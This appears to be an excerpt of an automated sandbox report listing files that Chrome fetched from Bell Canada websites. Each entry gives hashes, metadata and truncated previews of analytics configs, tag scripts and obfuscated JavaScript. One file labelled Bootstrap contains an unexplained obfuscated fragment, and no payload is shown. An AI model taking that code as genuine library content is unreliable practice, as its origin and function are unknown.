                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:kmOlQLwOQtGUSq77TANO/9d47V6XzVoRFnVELEhIkLs9vNkU:9O7OlM7L/9d45yzEntBU
                                                                                                                                                                                                                                                                                                                                      MD5:10D5D1547BE78BBA64518E20A75A19A9
                                                                                                                                                                                                                                                                                                                                      SHA1:034B80BB6057878EA155CA2B20193EFAB645EF62
                                                                                                                                                                                                                                                                                                                                      SHA-256:4ABCC5A71027481A29BCE8BFCD6C86F6CCBFCFBD01F82471D45D10F211C71ACA
                                                                                                                                                                                                                                                                                                                                      SHA-512:422C2EC9980F1432D0B66B2B1BF7486BB0446ED6ACE50A5FC776133FF127673A37C5C544C199476DA78E46AD6D995BE24ADF3EDA9296A7FB82EB16E4F8D15CFC
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:{"h.key":"ELNCJ-SNJ8G-MAJUF-JX27D-KEUXV","h.d":"bell.ca","h.t":1730380349559,"h.cr":"880c32d229252627a5a940a9271c8b10fb991bbe-65f4033f-4680ccf8","session_id":"e6fc3076-02df-43a9-8b38-530e435ba190","site_domain":"bell.ca","beacon_url":"//684dd32c.akstat.io/","autorun":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"CrossDomain":{"sending":false,"cross_domain_url":""},"Errors":{"enabled":true,"monitorTimeout":true,"monitorEvents":true,"maxErrors":10,"sendAfterOnload":true,"sendInterval":1000},"Continuity":{"enabled":true},"PageParams":{"xhr":"none","pageGroups":[{"type":"Regexp","parameter1":"^http(s)?:\\/\\/www\\.bell\\.ca(\\/|\\/\\?prov=(qc|on)(\\&lang=(en|fr))?|/\\?lang(uage)?=(en|fr)(\\&prov=on)?)$","parameter2":"Home Page","on":["navigation"]},{"type":"Regexp","parameter1":"^http(?:s)?:\\/\\/www\\.bell\\.ca\\/mobilit(?:e|y)\\/produ(i|c)ts\\/iPhone-14","parameter2":"Mobility Product Details iPhone 14","o
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):14602
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6344281406456185
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:cIReZtCQ5tZDXHj7je4xb7s79bVzynWiv43JA9hfETCfn1KacVuqE6Z3IPK:mRHa457s7VAWz3JyE2fn1KacVuqE6Z3B
                                                                                                                                                                                                                                                                                                                                      MD5:BB18E06557B886DADD854B9250901D51
                                                                                                                                                                                                                                                                                                                                      SHA1:D3AD02BBABEFD29E332850558C479059D393EBDC
                                                                                                                                                                                                                                                                                                                                      SHA-256:91C3F1E71D54ADF39F70FD48951549971D4D8C2A0F66A74463616116E5910EC9
                                                                                                                                                                                                                                                                                                                                      SHA-512:4345A714BDB95CDAA29EF722AF8055C33E57004A643A2BDD957E0DDB6F2067FE67A7C3296735E5FA525D8B258D1FCFDE142D89D623190AEA425703705B3503DC
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(33,22-23): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(33,45-46): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i..(46,21-22): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: n..(38,25-26): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(37,25-26): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i..(43,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(42,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(41,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: b..(34,21-22): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(31,17-18): run-time error JS1300: Strict-mode does not
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (387)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):534
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.310902518772589
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBOSGWidct/BeTrAApBOSGWiIL8LCurKmwOgqPDRWxsM/n:zlFGWcct/BMlFGWGOurKEbRWxs6
                                                                                                                                                                                                                                                                                                                                      MD5:1D8410CA75BAC6F43C19AB0FB0F23796
                                                                                                                                                                                                                                                                                                                                      SHA1:886CF3DEBFE7CB280E359A3DFEFDA2A2AD503F04
                                                                                                                                                                                                                                                                                                                                      SHA-256:FB511A3C94D1480C3EE47DFF3085F23D27EF362F4257F7DE4C9CDE0FDA60C9B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:C36F668321C619B88ACD4F5F76331D32F32172886037692E4A47D83A849A371BB9C6CE66FD9BE41F44E4EBF0A67AE0EFA8ED79C47A7A66BDA99994D9E095D39D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b62040-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b62040-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b62040-source.min.js', "!function(){var e=document.createElement(\"script\");e.type=\"text/javascript\",e.async=!0,e.src=\"//siteimproveanalytics.com/js/siteanalyze_1154.js\";var t=document.getElementsByTagName(\"script\")[0];t.parentNode.insertBefore(e,t)}();");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):19814
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.358464069139172
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:+zA6aMy1QFmUEUg46U7CH2cL43uGL8c9TGpxETPLErdldotQ5/MloNEpnwC6x7nE:WA6aMy1SmU9g46U7CH2cL43uGL8c9TGG
                                                                                                                                                                                                                                                                                                                                      MD5:9105FA9732F270CA855136FACD30C835
                                                                                                                                                                                                                                                                                                                                      SHA1:C20661A1253BE80D780806F311E4A6306C3C4561
                                                                                                                                                                                                                                                                                                                                      SHA-256:6FB4BC1B751326238BD01A8463ACDF151C9EF3EB46F8CC9E7027AEF27EEC88FE
                                                                                                                                                                                                                                                                                                                                      SHA-512:EA871C8724EB86D833A41E2A082D3FBA466643BC7BD99ACE1A95CA4666980923896EE58A51F22D3E00BBC590EA17FA88A33DFEC4EFB497E5C9E60D7063F51DC5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:{"da_websiteId":693653,"da_account_flags":22527,"da_account_flags_orig":22527,"da_sessionId_e":"84E654F18AD2AE89A616AA13A6B4CC6A8F.1","da_leadId_e":"B7D567C29E92EA123347BB99E4B686613C","da_dnsRecord":"collection.decibelinsight.net","da_anonymiseIP":false,"da_ipHandling":0,"da_sessCookieFlags":3,"da_leadCookieFlags":0,"analysisSessFlags":0,"analysisLeadFlags":0,"replaySessFlags":3,"replayLeadFlags":0,"int_state":"","curTime":1730380334,"domains":["24-order-aliant.ids.int.bell.ca","service.aliant.bell.ca","monbell.bell.ca","int.bell.ca","fbsc-www.ids.int.bell.ca","bellaliant.bell.ca","aliant.bell.ca","28-service-aliant.ids.int.bell.ca","pp-orderaliant.bell.ca","pp-bellaliant.bell.ca","28-bellaliant.ids.int.bell.ca","24-service-aliant.ids.int.bell.ca","28-order-aliant.ids.int.bell.ca","www-p1.int.bell.ca","orderinternet.bell.ca","order.aliant.bell.ca","mybell.bell.ca","myaccount.bell.ca","www-p2.int.bell.ca","www.bell.ca","supportinternet.bell.ca","support.bell.ca","soutieninternet.bell.c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):330683
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.998572897722901
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:8ueYWvdFXxI/4YNNsn4qrDH5cxOlpWpJAkdJYJM70cJxMvWS2cTtycAraMp:deP4AH5vlQJA4JYSAcy2cTtyt
                                                                                                                                                                                                                                                                                                                                      MD5:8EBCC45DF3525B14228585B7291E777B
                                                                                                                                                                                                                                                                                                                                      SHA1:75E4B80A1F12A7C7EB5CD84EA9257F28A9F9DA48
                                                                                                                                                                                                                                                                                                                                      SHA-256:2178939A4C224E46830C2D5A5233480621324AE8B25952EA43562CE2ABE272DF
                                                                                                                                                                                                                                                                                                                                      SHA-512:AB4AF70132A942F4E9C4BE261D73607B5CB0E5B50E90433400DBAD17C411D323317926B1FD0E90251356716E2D6DD798625FE21F670669F5F67B68F668B74EFD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function C(fC,g,y,h){var fJ=ReferenceError,fp=TypeError,fE=Object,fK=RegExp,fn=Number,fi=String,fz=Array,fG=fE.bind,fF=fE.call,fv=fF.bind(fG,fF),U=fE.apply,fB=fv(U),j=[].push,s=[].pop,M=[].slice,w=[].splice,R=[].join,P=[].map,N=fv(j),z=fv(M),S=fv(R),D=fv(P),B={}.hasOwnProperty,fT=fv(B),n=JSON.stringify,fb=fE.getOwnPropertyDescriptor,fQ=fE.defineProperty,fl=fi.fromCharCode,O=typeof URL==="function"?URL.createObjectURL:null,fr=typeof Blob==="function"?Blob:null,fL=typeof Worker==="function"?Worker:null,A=Math.min,fk=Math.floor,fI=fE.create,H="".indexOf,e="".charAt,fd=fv(H),fa=fv(e),ft=typeof Uint8Array==="function"?Uint8Array:fz;var ff=[fJ,fp,fE,fK,fn,fi,fz,fG,fF,U,j,s,M,w,R,P,B,n,fb,fQ,fl,A,fk,fI,H,e,ft];var E=["RMS8enmxNig-w80cm15-KIrnSxhMFrWri59l0HvFJfB6eCX2","yaaXHVehRSdR574h2FJzCLG3a2Q","querySelector","4OnMOR3yfg","0pqYbAqgNwZ5","y_vUTk0","i9fbdFrrPFQ3i5Vg","fx586Odo2Mqa","WKTYXl3FdE5M65MG30Q","JDoHjNp14J3ueFKYJ9XWvQBez9rJ6XFQSniNfOlDuA","DsXaSX4","1KCNVkeU","DiRXibtA","7mVXwqQ","
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2824
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1043
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.795529473968186
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:XC2P/YxF7/4uzAwN+MxISci0mrj1d39Kq0TG2P/aHymAg/BjmPJq:XB+FbxIScrmrj17+laBCJq
                                                                                                                                                                                                                                                                                                                                      MD5:4D11A9F8139F8339BBF26682795D846E
                                                                                                                                                                                                                                                                                                                                      SHA1:BA3EAC856B858768CAEC07335E55D658F633E321
                                                                                                                                                                                                                                                                                                                                      SHA-256:DDACD78A357FE592BA50B07C4173251AE3D3141F7DED44551D66B7CF8C865707
                                                                                                                                                                                                                                                                                                                                      SHA-512:64D179B7372126FE283AB0BD69C1A8AE270D45AB9BA7E7BF67441C541EEB6C8724FE018D340AA4258A4531E779536628E6A7E179D08DB62D3C8DC5C7D65B0C3A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/Web/MYB/custom/css/eChat/eChat-Light.min.css
                                                                                                                                                                                                                                                                                                                                      Preview:...........V]k.8.}/.?h...ed<nf.#..,K.l_..P. .-jKF..I.....e[N.t...ss}...G.....'R.T.M.`j.LF-k.xQj,..9O..R.l.y 9?.,N...%..=...9.w....*.z.n.'x.....*...@v.S..a..0U..'..b.k.$M5.cK.>.*c...L.d.BJ... ..TVR..<.VT..ULh.y...H++...p#o.\f"fv.!.{H...pC.s.Cb.t...x.}..'^7Ri*t.....+v....\..%) `j.P|...'4.Z(....g....T..T.. 6Yp.....d.bW.x$-|.kv.7M.)._...f...r4.%Wa..9Q..5$.zY..P..s..3.14...z...m...<^~.Y.)jS.@Td.gG..p.N.._..j...t....:T.C8.2\6....e.d!}^F.b.F.q......_..3-.Mp<....q...hM...ud?:.sC7...F.0..GP......].`y..m...l]F.*..r.v..2.....$}'..L....9nh.qQ...:...<.Y...y(.w='....`b`;.?...65.{.TZ....v4M`.:.b-.b.....D!.......S-,.Fr....B.......vY......0..i.../..@1v.J...iY..pV.z|..\.W..dJ6Nz..b....`......lb\.o?...K.....M.X..v.FB@~R.va..h....p......z>...m..$.A5v..8...].A..g..R6.6%4ai..W.c.w{{......a./D..;...u.V...>'.RT.KU....;..I..2\........?.s..o$.i.~o..^.w.1C3.-.2*.<..;...1(.L.S.,.e.......&...............QU....u. ....=....W....`..A.lP......|kG.>...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65304)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):66518
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.53137669386854
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/zespvjBiDfGA3+TY1q6/PtN/IOBK6+BcVMk:bbAOT8qIPtN/h+I
                                                                                                                                                                                                                                                                                                                                      MD5:1C23E183C1A1AC09D117C247EBEC1DA7
                                                                                                                                                                                                                                                                                                                                      SHA1:69A660BB58415789C5D4F0358726F197832DBFEA
                                                                                                                                                                                                                                                                                                                                      SHA-256:1C92955A8902B18CFAAEC837BC73FC6E9AE59F8F64D1579BC9E2A26BAB5DD681
                                                                                                                                                                                                                                                                                                                                      SHA-512:0DAB25359DDE9189D63DBFEC3A7425DB61DB8BA67BA989780864A88595595550E0C8D2747EB272E9DAA3F01DE94635921CC948F8D92C1520455E3B99FD573CE9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Bootstrap (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if (!t.document) throw new Error("Bootstrap requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,function(t,e){"use strict";function n(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}function o(){}function i(t,e){return new i.fn.init(t,e)}function r(t){return"function"==typeof t}function s(t){return"string"==typeof t}function a(t){return"object"==typeof t&&null!==t}function c(t){return a(t)&&t.nodeType}function u(t){return t instanceof i}(function(a,b){function Z(a,b,c,d,e){return a0d(b-0x22d,a);}function a1(a,b,c,d,e){return a0d(d-0x1bc,c);}function a0(a,b,c,d,e){return a0d(
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (306)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.382146487038442
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBUQkRjKct/BeTrAApBUQkRjnLpKJy7rcJy71U/:zlRkRjKct/BMlRkRjlKJWcJP
                                                                                                                                                                                                                                                                                                                                      MD5:7C19AB31B2BE8287A6C7588F00E26F4B
                                                                                                                                                                                                                                                                                                                                      SHA1:A7B67ED798EF4778CA8A80B150E367BB345207BA
                                                                                                                                                                                                                                                                                                                                      SHA-256:2A1FECD7ABC4FD5CF59C210DFEEB99B5DF930ABF127E4C7D32A51FD3E49DB652
                                                                                                                                                                                                                                                                                                                                      SHA-512:05D69CA248599B085FDDEAC78DDA210ACE4D10126B3EE79907404E9A35AC96070BA0E460C937379F3AA327C045461DF5E7408D04F59D4F7BC83D81E3FE2F5361
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC75774c0414094b0fb6a984a589f3a296-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC75774c0414094b0fb6a984a589f3a296-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC75774c0414094b0fb6a984a589f3a296-source.min.js', "!0===_satellite.getVar(\"d_consent_banner_check\")?window.s_oOTB=!1:!1===_satellite.getVar(\"d_consent_banner_check\")?window.s_oOTB=!0:window.s_oOTB=null;");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65304)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):66518
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.53137669386854
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/zespvjBiDfGA3+TY1q6/PtN/IOBK6+BcVMk:bbAOT8qIPtN/h+I
                                                                                                                                                                                                                                                                                                                                      MD5:1C23E183C1A1AC09D117C247EBEC1DA7
                                                                                                                                                                                                                                                                                                                                      SHA1:69A660BB58415789C5D4F0358726F197832DBFEA
                                                                                                                                                                                                                                                                                                                                      SHA-256:1C92955A8902B18CFAAEC837BC73FC6E9AE59F8F64D1579BC9E2A26BAB5DD681
                                                                                                                                                                                                                                                                                                                                      SHA-512:0DAB25359DDE9189D63DBFEC3A7425DB61DB8BA67BA989780864A88595595550E0C8D2747EB272E9DAA3F01DE94635921CC948F8D92C1520455E3B99FD573CE9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/js/bootstrap.min.js?ver=202410092027
                                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Bootstrap (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if (!t.document) throw new Error("Bootstrap requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,function(t,e){"use strict";function n(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}function o(){}function i(t,e){return new i.fn.init(t,e)}function r(t){return"function"==typeof t}function s(t){return"string"==typeof t}function a(t){return"object"==typeof t&&null!==t}function c(t){return a(t)&&t.nodeType}function u(t){return t instanceof i}(function(a,b){function Z(a,b,c,d,e){return a0d(b-0x22d,a);}function a1(a,b,c,d,e){return a0d(d-0x1bc,c);}function a0(a,b,c,d,e){return a0d(
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (13876)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344073
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6049417690710515
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:p4HQGbgBuzogk2639cM8Gp/22wVtu9BW24nOw:iH9cuzogdVAEn
                                                                                                                                                                                                                                                                                                                                      MD5:42BE95A652ABE979481F5376603B25E7
                                                                                                                                                                                                                                                                                                                                      SHA1:2AD2E5C75CD7ED10839FBC1DD734586636BCEB7C
                                                                                                                                                                                                                                                                                                                                      SHA-256:54336AE6343E44D2F5802D18B6C181A5D0A7B08B7539C29F48C0A9FA5856D642
                                                                                                                                                                                                                                                                                                                                      SHA-512:850F56FF95A51A8B33CB0F69540066686336EECC5A3E4FFF368330FC1FB463A09A8327650D701DF8501EE8FB1DB5881CC566569A16CC377BFBC5143E43054C5E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-MTKGWZ28E4
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":107},{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":1,"vtp_paramValue":"internal","vtp_ruleResult":["macro",2],"tag_id":109},{"function":"__ogt_dma","priority":29,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":110},{"function":"__ogt_1p_data_v2","priority":29,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailTy
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):56
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.800845493904029
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:HrPyuWthLczNdCGcf21ATUJn:zybpc5xJn
                                                                                                                                                                                                                                                                                                                                      MD5:9D022844110C30BE976257FEAB38FFA6
                                                                                                                                                                                                                                                                                                                                      SHA1:6A26BAD4CE7E5D4F0449F2197EC4D9E5487E9657
                                                                                                                                                                                                                                                                                                                                      SHA-256:2C1DAC5544CBC45ACA424A4466E32091A133211F0918AA713A3865AFF7DAA15F
                                                                                                                                                                                                                                                                                                                                      SHA-512:A7B6A5EA636CB560411F9342BF817B03B9D94D8D1BCE2313FFA8C0A560B101161906E9004BBFB8FDAFDFF29CB380EE977D02EF427E22E354F88608648D0C566E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAma3DI3wueGHBIFDVKKSaMSEAkZWbjwtxQeYRIFDSI9jt8SFwnqq-8MLIIpwxIFDWdns_4SBQ3h5tTW?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:CgkKBw1SikmjGgAKCQoHDSI9jt8aAAoSCgcNZ2ez/hoACgcN4ebU1hoA
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREIuyqXXl6EAFVQ1CSHI:UrXizqX1yVMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9DFBB6CAC092BCB8F48829FC4288B018
                                                                                                                                                                                                                                                                                                                                      SHA1:8204272FAB7E63D8FB57A8F269113CAFFBBDB29E
                                                                                                                                                                                                                                                                                                                                      SHA-256:5EC52ECA2172F55B7784AD81618465F238F83AA68A84C6209F7181E45C55B165
                                                                                                                                                                                                                                                                                                                                      SHA-512:F752C969BD6077556F23C28AD832B42DBDC02CD21DC63D78B5D46CCBE37A15AD3D6B12F86356CB7DBA6B74A9C5B71E5FB2B74D365DF204FDEA19BE1C59E4DA5B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__10 === 'function' && branch_callback__10("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
